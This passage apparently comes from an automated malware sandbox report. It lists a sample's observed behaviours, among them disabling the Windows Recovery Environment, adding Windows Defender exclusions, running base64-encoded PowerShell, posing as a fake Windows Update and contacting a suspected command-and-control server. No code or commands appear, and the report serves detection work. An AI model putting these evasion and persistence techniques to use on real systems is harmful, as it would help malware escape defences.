Starts REAGENTC.EXE to disable the Windows Recovery Environment

SUSPICIOUS

Starts POWERSHELL.EXE for commands execution

Possibly malicious use of IEX has been detected

Starts CMD.EXE for commands execution

Uses REG/REGEDIT.EXE to modify registry

Application launched itself

The process bypasses the loading of PowerShell profile settings

The process hides Powershell's copyright startup banner

Reads the Windows owner or organization settings

Reads security settings of Internet Explorer

Runs shell command (SCRIPT)

Script adds exclusion path to Windows Defender

Found strings related to reading or modifying Windows Defender settings

Uses ATTRIB.EXE to modify file attributes

Creates new GUID (POWERSHELL)

Executable content was dropped or overwritten

Writes data into a file (POWERSHELL)

Reads the date of Windows installation

Creates or modifies Windows services

Uses base64 encoding (POWERSHELL)

Probably fake Windows Update

The executable file from the user directory is run by the CMD process

Uses NETSH.EXE to add a firewall rule or allowed programs

Stops a currently running service

Windows service management via SC.EXE

Checks for external IP

Modifies existing scheduled task

Query Microsoft Defender preferences

Contacting a server suspected of hosting an CnC

Starts application with an unusual extension

Runs PING.EXE to delay simulation

Connects to unusual port

Executing commands from a ".bat" file

INFO

Disables trace logs

Checks proxy server information

Reads the computer name

Checks supported languages

Reads the software policy settings

Executable content was dropped or overwritten

Process checks computer location settings

Creates a software uninstall entry

Script raised an exception (POWERSHELL)

Checks if a key exists in the options dictionary (POWERSHELL)

Potential remote process memory writing (Base64 Encoded 'WriteProcessMemory')

Potential access to remote process (Base64 Encoded 'OpenProcess')

Potential remote process memory reading (Base64 Encoded 'ReadProcessMemory')

Creates files in the program directory

The executable file from the user directory is run by the Powershell process

Reads Environment values

Reads the machine GUID from the registry

Creates files or folders in the user directory

Changes the display of characters in the console

Malware configuration

Static information

Video and screenshots

Processes